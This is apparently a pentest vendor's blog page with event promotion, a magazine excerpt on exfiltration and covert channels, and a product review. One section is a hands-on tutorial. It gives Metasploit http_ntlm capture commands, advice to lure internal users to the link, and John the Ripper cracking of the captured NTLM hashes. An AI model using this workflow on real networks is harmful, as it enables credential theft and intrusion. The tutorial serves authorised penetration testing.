Win a Pwn Pad in Vegas!

Your chance to win a Pwn Pad in Vegas is coming up! Our Pwnie show kicks off at Black Hat in Vegas July 31st and takes us to DEFCON from August 1 to August 4th.

You can’t miss us, we have a sweet spot on the floor #19 at DEFCON right next door to Security Samurai. Sign up to win your own Pwn Pad at our booth.

We also have some great talks coming up:

Black Hat: How to Pentest 1,000 Branch Offices

CTO Jonathan Cran will demonstrate techniques and tools for penetration testing across the distributed enterprise. Building on the foundation provided by Pwnie Express products, and focusing specifically on high value targets, Jonathan will demonstrate methods for scaling your current testing procedures, and show how to test for high value vulnerabilities.

DEFCON: Wireless Pentesting with the Pwn Pad (at the Wireless Village)

Join the Pwnie Express team for a demonstration of the Pwn Pad in action. Attendees will gain knowledge of and access to plug & play tools that allow you to test for wireless vulnerabilities, enable visualization of the wireless spectrum, and shine a light on wireless client vulnerabilities. The session will start with an overview of wireless security and dive into a practical demonstration.

Capturing Integrated Windows Authentication with the Plug

The fine folks over at the Gentleman’s Hacker’s Club recently dropped a fun tidbit about the GoDaddy URL Shortener leaking NTLM creds over the Internet.  It’s worth mentioning that the vulnerability of the browser auto-submitting credentials isn’t just specific to GoDaddy but rather to anyone using an IE browser connected to a domain. It’s odd that credentials were being submitted over the internet, but this is presumably specific to their URL shortener setup.

It turns out that capturing NTLM credentials is a very relevant attack vector, especially on internal networks. The reason the Windows browser submits creditials is something called Integrated Windows Authentication. This turns out to work particularly well on internal networks, as the default is to allow authentication in the local LAN. Here’s a quick demo of how to test for it using the Pwn Plug:

First, open up a shell, and fire up the metasploit framework:

root@pwnix-dev:$ cd /opt/metasploit/msf3
root@pwnix-dev:$ ./msfconsole
MSF> use auxiliary/server/capture/http_ntlm
MSF (http_ntlm)> set JOHNPWFILE /tmp/creds.txt
MSF (http_ntlm)> set URIPATH /capture
MSF (http_ntlm)> set SRVPORT 8080

Once you’ve configured the http_ntlm module, it should look something like this when you type ‘info’:


Run exploit -z in order to start the server and you should see:

[*] Auxiliary module execution completed
[*] Using URL:
[*]  Local IP:
[*] Server started.

Great, now we’re capturing any credentials sent to the Plug. Even if Integrated Windows Authentication isn’t configured, the user browsing to this site will see an authentication prompt.

Simply send out your link to internal folks, or post it to some location where it will be noticed and clicked. Distribution is left as an exercise for the reader.

Once we have some captured credentials in our /tmp/cred.txt file, we’ll want to fire up John the Ripper, and get to cracking. You’ll want to pull down the latest John / jumbo patch in order to crack the NTLM hashes, so grab the latest.

    pwnie@pwnix-dev:$ wget
    pwnie@pwnix-dev:$ tar -zxvf john-1.7.9-jumbo-7.tar.gz
    pwnie@pwnix-dev:$ cd john-1.7.9-jumbo-7/src
    pwnie@pwnix-dev:~/john-1.7.9-jumbo-7/src$ make generic
    pwnie@pwnix-dev:~/john-1.7.9-jumbo-7/src$ cd ../run

    pwnie@pwnix-dev:~/john-1.7.9-jumbo-7/run:$ ./john /tmp/creds.txt_netntlm
    Loaded 2 password hashes with no different salts (NTLMv1 C/R MD4 DES (ESS MD5) [32/64])
    test             (test)
    test             (test)
    guesses: 2  time: 0:00:00:00 DONE (Fri Jan 18 09:47:10 2013)  c/s: 70600  trying: test!!! - tst

And there you have it, simple & easy credential stealing.

If you want to take this attack a little further, take a look at @zfasel’s ZackAttack project which relays credentials to the domain, allowing you to easily pop a shell via a submitted NTLM credential.

Exfiltration and Covert Channels in Cyber Defense Magazine

Hey all, we wanted to give you a heads up on an article we put together in the new Cyber Defense Magazine. The article talks about current data exfiltration techniques – both by automated and manual techniques, and commonly used tools in that environment. Here’s a small excerpt from the article:

A point of access must first be established – this is what is traditionally referred to as the security breach. This is commonly occuring via a client-side exploit, weak system credentials, or SQL injection. According to recent reports, the most commonly used technique today by sentient attackers is via your own remote access applications – RDP or even your own VPN.

Once that point of access is obtained, the attacker then goes looking for interesting data in the environment. Data at rest is often gathered via built-in Windows shares or FTP, and data in transit is gathered with a variety of techniques, the most common of which is now parsing memory, where data is unencrypted and available for the taking.

Attackers are likely to use your own built-in tools to exfiltrate data too. Because these remote access tools are typically encrypted, and traditionally hard to inspect, this is an easy way for the attacker to pull data out of the environment without detection. One of the best things you can do to protect yourself is monitor usage of the channels, and watch for anomalies.

Today’s malware is also using common internet protocols to send your data out. Partially because of the complexity of automating remote access solutions, and in part due to the availability HTTPS, FTP and SMTP libraries, these protocols are often used by malware to send data out of the environment.

The article goes on to talk about advanced techniques in data exfiltration, something we’ve focused on a lot here at Pwnie Express:

Using a technique called “tunneling,” data can be encrypted in archives or in transit, limiting the ability to inspect it at a proxying firewall – It just looks like traffic over HTTP/S, or DNS, or ICMP, among others. These are commonly referred to as “covert channels.” With covert channels, attackers can hide what they are saying or passing by writing a message inside a message, much like stenography can hide a picture inside a picture.

We fact-checked against the recent breach reports, specifically Trustwave’s excellent ‘Global Security Report‘. If you’re interested in the full article, check out Cyber Defense Magazine.

PC Mag Editors Choice Review

Pwn Plug Product Review by PC Magazine 

by Fahmida Y. Rashid 

Pwn Plug (Basic: $480, Elite: $770) is a harmless-looking little white device that makes it possible to run penetration tests against any network easily and unobtrusively. A mini-computer that looks more like an oversized power adapter, it comes pre-loaded with various hacking tools to probe open ports on networks, sniff incoming and outgoing data packets, hijack SSL traffic, and crack wireless encryption keys, among others. With Pwn Plug, security teams can scan and check the security of their networks, making it an invaluable part of any network administrator’s arsenal of tools.


(Original Article)